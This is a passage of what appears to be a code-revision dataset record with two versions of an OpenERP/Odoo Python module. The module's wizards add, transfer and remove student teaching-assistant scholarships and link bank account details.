'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): 
[('id', 'in', disc)]}}\n        if not disc:\n            res['value'] = {('disciplina_id_' + comp): False}\n        return res\n\n    def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n        doc_discente_id, context=None):\n        if disciplina_id and doc_discente_id:\n            doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n                ).browse(cr, uid, doc_discente_id, context)\n            doc_discente_id = (doc_discente_id if doc_discente.\n                disciplina_id.id == disciplina_id else False)\n            return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n        return {'value': {('doc_discente_id_' + comp): False}}\n\n    def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n        if banco_id:\n            banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n                'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n                context=context, load='_classic_write')\n            vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n                'dv_conta': False, 'operacao': False}\n            vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n                .keys()})\n            return {'value': vals}\n        return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n            'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n            'agencia': False, 'dv_agencia': False, 'conta': False,\n            'dv_conta': False, 'operacao': False}}\n\n    def botao_transferir(self, cr, uid, ids, context=None):\n        perfil_model = self.pool.get('ud.perfil')\n        for transf in self.browse(cr, uid, ids, context):\n            matricula = transf.doc_discente_id_para.discente_id.matricula\n            for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n                if perfil.matricula == matricula and perfil.tipo == 'a':\n                    if perfil.is_bolsista:\n                        raise osv.except_osv(u'Discente bolsista',\n                            u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n                            .format(transf.doc_discente_id_para.discente_id\n                            .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n                            tipo_bolsa]))\n                    break\n            if not perfil:\n                raise osv.except_osv(u'Perfil excluído', \n                    u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n                    % matricula or '')\n            matricula = transf.doc_discente_id_de.discente_id.matricula\n            for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n                if perfil_de.matricula == matricula and perfil_de.tipo == 'a':\n                    break\n            responsavel = self.pool.get('ud.employee').search(cr,\n                SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n            if not responsavel:\n                raise osv.except_osv(u'Registro Inexistente',\n                    u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n                    )\n            if len(responsavel) > 1:\n                raise osv.except_osv(u'Multiplos vínculos',\n                    u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n                    )\n            valor = perfil_de.valor_bolsa\n            perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n                True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n            perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n                'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n                False})\n            transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n            transf.doc_discente_id_para.write({'state': 'bolsista',\n                'is_active': True})\n            get_banco(self, cr, transf, transf.doc_discente_id_para.\n                discente_id.pessoa_id.id, context)\n            evento = {'responsavel_id': responsavel[0], 'name':\n                u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n                doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n                doc_discente_id_para.discente_id.pessoa_id.id)],\n                'descricao': \n                u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula 
%(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula \"%(matricula_para)s\".'\n                % {'valor': valor, 'discente_de': transf.\n                doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n                'matricula_de': perfil_de.matricula, 'discente_para':\n                transf.doc_discente_id_para.discente_id.pessoa_id.name.upper(\n                ), 'matricula_para': perfil.matricula}}\n            transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n        return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n    _name = 'ud.monitoria.bolsa.remover.wizard'\n    _description = u'Remoção de bolsa de discente'\n    _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n        u'Semestre', required=True, readonly=True), 'curso_id': fields.\n        many2one('ud.curso', u'Curso', required=True, domain=\n        \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n        'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n        \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n        'doc_discente_id': fields.many2one(\n        'ud.monitoria.documentos.discente', u'Discente', required=True,\n        domain=\n        \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n        )}\n\n    def default_get(self, cr, uid, fields_list, context=None):\n        res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n            fields_list, context)\n        context = context or {}\n        if context.get('active_id', False):\n            if context.get('active_model', False) == 'ud.monitoria.registro':\n                res['semestre_id'] = context.get('active_id')\n            elif context.get('active_model', False\n                ) == 'ud.monitoria.documentos.discente':\n                doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n                    cr, uid, context.get('active_id'), context)\n                if doc.state != 'bolsista':\n                    raise osv.except_osv(u'Discente não bolsista',\n                        u'O discente não é bolsista')\n                elif not doc.is_active:\n                    raise osv.except_osv(u'Documento do discente inativo',\n                        u'Não é possível alterar o status de discentes inativos'\n                        )\n                res['semestre_id'] = doc.disciplina_id.semestre_id.id\n                res['curso_id'] = doc.disciplina_id.curso_id.id\n                res['disciplina_id'] = doc.disciplina_id.id\n                res['tutor'] = doc.tutor\n                res['doc_discente_id'] = doc.id\n        return res\n\n    def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n        disciplina_id, context=None):\n        if not (semestre_id and curso_id):\n            return {'value': {'disciplina_id': False}}\n        reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n            semestre_id, ['processos_seletivos_ids'], context=context, load\n            ='_classic_write')\n        args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n            reg['processos_seletivos_ids']), ('is_active', '=', True)]\n        disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n            args, context=context)\n        res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n        if not disc:\n            res['value'] = {'disciplina_id': False}\n        return res\n\n    def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n        doc_discente_id, context=None):\n        if disciplina_id and doc_discente_id:\n            doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n                ).browse(cr, uid, doc_discente_id, context)\n            doc_discente_id = (doc_discente_id if doc_discente.\n                disciplina_id.id == disciplina_id else False)\n            return {'value': {'doc_discente_id': doc_discente_id}}\n        return {'value': {'doc_discente_id': False}}\n\n    def botao_remover(self, cr, uid, ids, context=None):\n        perfil_model = self.pool.get('ud.perfil')\n        pessoa_model = self.pool.get('ud.employee')\n        for rem in self.browse(cr, uid, ids, 
context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-5": "# coding: utf-8\nfrom openerp import SUPERUSER_ID\nfrom openerp.osv import osv, fields\nfrom openerp.addons.ud.ud import _TIPOS_BOLSA\n\nTIPOS_BOLSA = dict(_TIPOS_BOLSA)\n\n\ndef get_banco(cls, cr, browse_record, usuario_id, context=None):\n dados_bancarios_model = cls.pool.get(\"ud.dados.bancarios\")\n args = [(\"banco_id\", \"=\", browse_record.banco_id.id)]\n if browse_record.agencia_v:\n args.append((\"agencia\", \"=\", browse_record.agencia))\n if browse_record.dv_agencia_v:\n args.append((\"dv_agencia\", \"=\", browse_record.dv_agencia))\n if browse_record.conta_v:\n args.append((\"conta\", \"=\", browse_record.conta))\n if browse_record.dv_conta_v:\n args.append((\"dv_conta\", \"=\", browse_record.dv_conta))\n if browse_record.operacao_v:\n args.append((\"operacao\", \"=\", browse_record.operacao))\n dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args, context=context)\n if dados_bancarios:\n dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID, dados_bancarios[0])\n if not dados_bancarios.ud_conta_id:\n return dados_bancarios.id\n elif dados_bancarios.ud_conta_id.id == usuario_id:\n return dados_bancarios.id\n raise osv.except_osv(u\"Dados Bancários duplicados\", u\"Outra pessoa já possui esses dados bancários!\")\n dados = {\"banco_id\": browse_record.banco_id.id, \"agencia\": browse_record.agencia, \"dv_agencia\": browse_record.dv_agencia,\n \"conta\": browse_record.conta, \"dv_conta\": browse_record.dv_conta, \"operacao\": browse_record.operacao,\n \"ud_conta_id\": usuario_id}\n return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=context)\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.adicionar.wizard\"\n _description = u\"Inclusão de bolsa de monitoria para discente (UD)\"\n\n _STATES = [\n (\"n_bolsista\", u\"Não Bolsista\"),\n (\"reserva\", u\"Cadastro de Reserva\"),\n ]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get(\"ud.monitoria.oferta.disciplina\")\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n \"curso_id\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), \"\n \"('is_active', '=', True)]\"),\n \"bolsas\": fields.function(_bolsas, type=\"integer\", string=u\"Bolsas disponíveis\",\n help=u\"Número de bolsas disponíveis para a disciplina\"),\n \"valor_bolsa\": fields.float(u\"Bolsa (R$)\"),\n \"tutor\": fields.boolean(u\"Tutor?\"),\n \"status\": fields.selection(_STATES, u\"Status\", required=True),\n \"doc_discente_id\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), \"\n \"('is_active', '=', True), ('state', '=', status)]\"),\n # DADOS BANCÁRIOS\n \"dados_bancarios_id\": fields.many2one(\"ud.dados.bancarios\", u\"Dados Bancários\", domain=[('id', '=', False)]),\n \"banco_id\": fields.many2one(\"ud.banco\", u\"Banco\", ondelete=\"restrict\"),\n \"agencia\": fields.char(u\"Agência\", size=4, help=u\"Número da Agência\"),\n \"dv_agencia\": fields.char(u\"DV Agência\", size=2, help=u\"Dígito verificador da 
Agência\"),\n \"conta\": fields.char(u\"Conta\", size=10, help=u\"Número da Conta\"),\n \"dv_conta\": fields.char(u\"DV Conta\", size=1, help=u\"Dígito verificador da Conta\"),\n \"operacao\": fields.char(u\"Operação\", size=3, help=u\"Tipo de conta\"),\n\n \"agencia_v\": fields.related(\"banco_id\", \"agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_agencia_v\": fields.related(\"banco_id\", \"dv_agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"conta_v\": fields.related(\"banco_id\", \"conta\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_conta_v\": fields.related(\"banco_id\", \"dv_conta\", type=\"boolean\", invisible=True, readonly=True),\n \"operacao_v\": fields.related(\"banco_id\", \"operacao\", type=\"boolean\", invisible=True, readonly=True),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid, fields_list, context)\n res[\"status\"] = \"n_bolsista\"\n res[\"valor_bolsa\"] = 400.\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"), context)\n if doc.state == \"bolsista\":\n raise osv.except_osv(u\"Discente bolsista\", u\"O discente já é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\", u\"Não é possível alterar o status de discentes inativos\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id\"] = doc.disciplina_id.id\n res[\"tutor\"] = doc.tutor\n res[\"status\"] = doc.state\n res[\"doc_discente_id\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id\": False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", \"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id\": [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"]= {\"disciplina_id\": False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n disciplina_id = self.pool.get(\"ud.monitoria.disciplina\").browse(cr, uid, disciplina_id, context)\n return {\n \"value\": {\"doc_discente_id\": doc_discente_id,\n \"bolsas\": disciplina_id.bolsas}\n }\n return {\"value\": {\"doc_discente_id\": False, \"bolsas\": 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id, dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = 
getattr(doc.dados_bancarios_id, \"id\", False)\n return {\"value\": {\"dados_bancarios_id\": dados_bancarios_id},\n \"domain\": {\"dados_bancarios_id\": [(\"ud_conta_id\", \"=\", doc.discente_id.id)]}}\n return {\"value\": {\"dados_bancarios_id\": False},\n \"domain\": {\"dados_bancarios_id\": [(\"id\", \"=\", False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get(\"ud.banco\").read(cr, uid, banco_id, [\n \"agencia\", \"dv_agencia\", \"conta\", \"dv_conta\", \"operacao\"\n ], context=context, load=\"_classic_write\")\n vals = {\"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}\n vals.update({\"%s_v\" % dado: banco.get(dado) for dado in banco.keys()})\n return {\"value\": vals}\n return {\"value\": {\"agencia_v\": False, \"dv_agencia_v\": False, \"conta_v\": False, \"dv_conta_v\": False,\"operacao_v\": False,\n \"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u\"Bolsas Insuficientes\", u\"Não há bolsas disponíveis para essa disciplina\")\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"O discente não pode ser classificado como bolsista\")\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(\n u\"Discente bolsista\",\n u\"O discente \\\"{}\\\" sob matrícula \\\"{}\\\" possui bolsa do tipo: \\\"{}\\\"\".format(\n add.doc_discente_id.discente_id.name, add.doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.tipo_bolsa]\n )\n )\n responsavel = self.pool.get(\"ud.employee\").search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.inscricao_id.perfil_id.id, {\n \"is_bolsista\": True, \"tipo_bolsa\": \"m\", \"valor_bolsa\": (\"%.2f\" % add.valor_bolsa).replace(\".\", \",\")\n })\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({\"state\": \"bolsista\", \"dados_bancarios_id\": dados_bancarios})\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Adição de bolsa: \\\"%s\\\"\" % add.doc_discente_id.discente_id.name,\n \"envolvidos_ids\": [(4, add.doc_discente_id.discente_id.id)],\n \"descricao\": u\"Uma bolsa de R$ %s foi vinculada para o(a) discente \\\"%s\\\" sob matrícula \\\"%s\\\".\" % (\n (\"%.2f\" % add.valor_bolsa).replace(\".\", \",\"),\n add.doc_discente_id.discente_id.name.upper(), add.doc_discente_id.inscricao_id.perfil_id.matricula\n )\n }\n add.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.transferir.wizard\"\n _description = u\"Transferência de bolsa de monitoria (UD)\"\n\n _STATES 
= [\n (\"n_bolsista\", u\"Não Bolsista\"),\n (\"reserva\", u\"Cadastro de Reserva\"),\n ]\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n\n \"curso_id_de\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id_de\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('id', '=', False)]\"),\n \"tutor_de\": fields.boolean(u\"Tutor?\"),\n \"doc_discente_id_de\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('is_active', '=', True), ('state', '=', 'bolsista'), \"\n \"('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"),\n\n \"curso_id_para\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id_para\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), \"\n \"('is_active', '=', True)]\"),\n \"tutor_para\": fields.boolean(u\"Tutor?\"),\n \"status_para\": fields.selection(_STATES, u\"Status\", required=True),\n \"doc_discente_id_para\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('is_active', '=', True), ('state', '=', status_para), \"\n \"('disciplina_id', '=', disciplina_id_para), \"\n \"('tutor', '=', tutor_para)]\"),\n # DADOS BANCÁRIOS\n \"banco_id\": fields.many2one(\"ud.banco\", u\"Banco\", ondelete=\"restrict\"),\n \"agencia\": fields.char(u\"Agência\", size=4, help=u\"Número da Agência\"),\n \"dv_agencia\": fields.char(u\"DV Agência\", size=2, help=u\"Dígito verificador da Agência\"),\n \"conta\": fields.char(u\"Conta\", size=10, help=u\"Número da Conta\"),\n \"dv_conta\": fields.char(u\"DV Conta\", size=1, help=u\"Dígito verificador da Conta\"),\n \"operacao\": fields.char(u\"Operação\", size=3, help=u\"Tipo de conta\"),\n\n \"agencia_v\": fields.related(\"banco_id\", \"agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_agencia_v\": fields.related(\"banco_id\", \"dv_agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"conta_v\": fields.related(\"banco_id\", \"conta\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_conta_v\": fields.related(\"banco_id\", \"dv_conta\", type=\"boolean\", invisible=True, readonly=True),\n \"operacao_v\": fields.related(\"banco_id\", \"operacao\", type=\"boolean\", invisible=True, readonly=True),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid, fields_list, context)\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"),\n context)\n if doc.state != \"bolsista\":\n raise osv.except_osv(u\"Discente bolsista\", u\"O discente já é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"O discente não pode ser classificado como bolsista\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id_de\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id_de\"] = doc.disciplina_id.id\n 
res[\"tutor_de\"] = doc.tutor\n res[\"status_de\"] = doc.state\n res[\"doc_discente_id_de\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id_\" + comp: False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", \"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id_\" + comp: [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"] = {\"disciplina_id_\" + comp: False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id, doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n return {\n \"value\": {\"doc_discente_id_\" + comp: doc_discente_id}\n }\n return {\"value\": {\"doc_discente_id_\" + comp: False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get(\"ud.banco\").read(cr, uid, banco_id, [\n \"agencia\", \"dv_agencia\", \"conta\", \"dv_conta\", \"operacao\"\n ], context=context, load=\"_classic_write\")\n vals = {\"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}\n vals.update({\"%s_v\" % dado: banco.get(dado) for dado in banco.keys()})\n return {\"value\": vals}\n return {\"value\": {\"agencia_v\": False, \"dv_agencia_v\": False, \"conta_v\": False, \"dv_conta_v\": False,\"operacao_v\": False,\n \"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == \"a\":\n if perfil.is_bolsista:\n raise osv.except_osv(\n u\"Discente bolsista\",\n u\"O discente \\\"{}\\\" sob matrícula \\\"{}\\\" possui bolsa do tipo: \\\"{}\\\"\".format(\n transf.doc_discente_id_para.discente_id.pessoa_id.name, matricula,\n TIPOS_BOLSA[perfil.tipo_bolsa]\n )\n )\n break\n if not perfil:\n raise osv.except_osv(\n u\"Perfil excluído\",\n u\"O perfil do discente para a matrícula \\\"%s\\\" não existe ou foi excluído\" % matricula or \"\"\n )\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == \"a\":\n break\n responsavel = self.pool.get(\"ud.employee\").search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n 
